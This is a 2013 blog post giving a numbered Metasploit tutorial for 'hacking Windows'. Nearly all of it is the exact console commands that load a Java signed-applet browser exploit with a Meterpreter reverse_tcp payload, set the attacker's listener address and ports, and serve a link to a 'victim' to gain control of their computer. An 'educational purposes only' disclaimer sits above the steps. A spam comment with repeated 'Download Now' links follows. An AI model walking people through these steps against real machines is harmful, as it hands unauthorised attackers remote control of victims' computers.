Ads 468x60px

Sunday, April 28, 2013

Hacking Windows With Metasploit (Tutorial 1)

This will be the first in a series of windows hacking tutorials using metasploit. The Metasploit Framework is one of the most valuable tools to a hacker/pentester. It allows you to use exploits in windows machines to open a meterpreter session and gain control of the victim's computer.

This tutorial will teach you a simple way to exploit a windows machine using metasploit.

THIS IS FOR EDUCATIONAL PURPOSES ONLY!!!
I AM NOT RESPONSIBLE FOR MISUSE

MSFCONSOLE

DIFFICULTY: 2

  1. Open up backtrack
  2. Open Terminal
  3. Type 'ifconfig'
  4. Write down your ip address
  5. Open a new Terminal window
  6. Type 'msfconsole' (Metasploit should look like in picture on top)
  7. Type 'use exploit/multi/browser/java_signed_applet' then hit enter
  8. Type 'set payload windows/meterpreter/reverse_tcp' then hit enter
  9. Type 'set lhost 192.168.1.110' (CHANGE 192.168.1.110 TO THE IP ADDRESS YOU WROTE IN STEP 4)
  10. Type 'set lport 443' then hit enter
  11. Type 'set srvport 80' then hit enter
  12. Type 'set uripath NotSoElite' (YOU CAN CHANGE NotSoElite TO ANY NAME)
  13. Type 'exploit' then hit enter---------------(SEE IMAGE BELOW)
  14. Now send
    'http://youripaddress:80/step12'
    to the victim's computer and they
    will be hacked
  15. Use 'sessions -l' to see hacked computers
  16. DONE!





THANKS TO D@RK TruTH FOR ORIGINAL TUTORIAL AND PICS
(‾⌣‾)♉ PEACE!

1 comments:

  1. The Not So Elite Haxor: Hacking Windows With Metasploit (Tutorial 1) >>>>> Download Now

    >>>>> Download Full

    The Not So Elite Haxor: Hacking Windows With Metasploit (Tutorial 1) >>>>> Download LINK

    >>>>> Download Now

    The Not So Elite Haxor: Hacking Windows With Metasploit (Tutorial 1) >>>>> Download Full

    >>>>> Download LINK eu

    ReplyDelete

 

Translate